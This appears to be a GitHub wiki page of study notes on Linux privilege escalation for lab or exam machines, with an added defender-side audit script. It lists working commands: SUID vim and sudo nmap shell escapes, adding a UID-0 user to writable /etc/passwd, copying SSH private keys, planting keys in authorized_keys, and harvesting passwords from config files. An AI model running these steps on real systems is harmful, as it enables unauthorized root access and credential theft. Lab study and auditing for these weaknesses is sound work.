Escalate the Privileges - singirikondamani/Noted GitHub Wiki

After getting user-level access to the machine at 0.0.0.0, the next step is to escalate privileges to root.

Method 1:

  • Step 1: Check which ports are open on the IP → nmap -p- 0.0.0.0
  • Step 2: Access the machine → ssh [email protected]
  • Step 3: Enter the password if one was provided → :**********
  • Step 4: Check the current user and sudo rights → whoami → sudo -l → pwd
  • Step 5: If the user appears in the sudo list, root actions can be performed → use pwd, cd and cat to open the root flag file.

Method 2: Additional Methods:

Search for passwords: find any passwords stored on the system → grep -i password /etc/*

Method 3: Exploiting SUID Binaries:

  • Run: find / -perm -4000 -type f 2>/dev/null → Look for files with SUID set (check for /find/ or /vim.basic). Only stderr is sent to /dev/null, so permission-denied noise is hidden while the matches stay visible.
  • Check permissions: ls -la /usr/bin/vim.basic → Look for -rwsr-xr-x (the s shows the SUID bit is set, so the file runs as its owner, root).
  • Exploit: Run Vim with a payload from the terminal: vim -c ':!sh' → This gives a root shell because Vim runs with root privileges.
  • Confirm: Run whoami → You should see root.

Method 4: Checking File Permissions:

  • Finding files with weak permissions → ls -la /etc/passwd /etc/shadow → Look for files that have write permission for group and other users, e.g. -rw-rw-r-- 1
  • Escalation – exploiting weak permissions on /etc/passwd: back it up first with cp /etc/passwd /tmp/passwd_backup → Edit /etc/passwd to add a new root user → hacker:x:0:0:Hacker:/root:/bin/bash
  • In the terminal → su hacker
  • Confirm: Run whoami → You should see root.
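As an added defender-side check, not part of these notes, the following POSIX shell audit looks for the conditions Methods 3 and 4 rely on: extra UID-0 accounts in /etc/passwd, group/other-writable /etc/passwd or /etc/shadow, and SUID bits on binaries like find, vim and nmap. The SUID watch list, the FINDING output format and the file paths passed in are assumptions; run it as audit /etc/passwd /etc/shadow /usr/bin on a real host.

```shell
#!/bin/sh
# Added audit helper, not part of the wiki notes above. It looks for the
# conditions Methods 3 and 4 rely on so a defender can find them first:
#   1. accounts other than root with UID 0 in /etc/passwd (the "hacker" line)
#   2. group/other write permission on /etc/passwd or /etc/shadow
#   3. SUID binaries whose names are on an assumed watch list (find, vim, nmap)
# Paths are parameters so the checks also run against copies or constructed samples.

# extra_uid0_users FILE -> prints every username with UID 0 except root
extra_uid0_users() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# mode_is_weak MODE -> true when an ls -l mode string has group or other write
mode_is_weak() {
    case "$1" in
        ?????w*|????????w*) return 0 ;;
    esac
    return 1
}

# on_watchlist NAME -> true when NAME is a binary the notes use for escalation
SUID_WATCHLIST="find vim vim.basic nmap bash sh"
on_watchlist() {
    for w in $SUID_WATCHLIST; do
        if [ "$1" = "$w" ]; then return 0; fi
    done
    return 1
}

# suid_watchlist DIR -> SUID files under DIR whose basename is on the watch list
suid_watchlist() {
    find "$1" -perm -4000 -type f 2>/dev/null | while read -r f; do
        if on_watchlist "$(basename "$f")"; then echo "$f"; fi
    done
}

# audit PASSWD SHADOW DIR -> one FINDING line per weakness; returns 1 if any
audit() {
    rc=0
    for u in $(extra_uid0_users "$1"); do echo "FINDING: UID 0 account $u"; rc=1; done
    for f in "$1" "$2"; do
        [ -e "$f" ] || continue
        m=$(ls -ld "$f" | cut -c1-10)
        if mode_is_weak "$m"; then echo "FINDING: $f is $m"; rc=1; fi
    done
    for f in $(suid_watchlist "$3"); do echo "FINDING: SUID $f"; rc=1; done
    return $rc
}
```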

Method 5: Root Gain access.

  • After gaining access to the machine, in the terminal run → TF=$(mktemp)
  • Then run → echo 'os.execute("/bin/sh")' > $TF
  • And run → sudo nmap --script=$TF. This exploits Nmap's scripting engine to run a custom Lua script that opens a root shell, giving the attacker root access by executing commands as the root user.

Method 6: Root Gain access (Horizontal)

  • After logging in to the remote server, run sudo -l, which shows whether the user has any sudo rights. If there are none, it will say so; but if it says the user may run /bin/bash as another user, follow the commands below.
  • sudo -u user2 /bin/bash → gives a shell as the other user, which leads to root because that user has root access, as seen in the earlier message.

Method 7: Root Gain access (Vertical)

  • For example, if you can SSH in as a normal user but cannot access files inside the /root folder, go to the .ssh folder and copy the id_rsa private key.
  • Copy the key to the local or attacker machine, e.g. with nano id_rsa
  • Give the file the right permissions: chmod 600 id_rsa
  • Now try to access the remote system with ssh [email protected] -p 50706 -i id_rsa (ssh takes the port with lowercase -p; uppercase -P is the scp option). TIP: If you can change the authorized_keys file in .ssh, you can add the hacker's public key to authorized_keys and log in to the server with the hacker's private key.

Method 8: Root Gain access

  • Identify the root password from the /var/www/html folder: run cd /var/www/html
  • Identify any file containing the password by running ls
  • or run grep -nr "db-user"
  • Observe the output and take the password from any DB config file.

Method 9: Root Gain access

  • Automate the process with: LinEnum
  • and: LinPEAS
  • These tools help find applicable CVEs; then go to Exploit-DB, find the matching scripts and run them to pass the exam.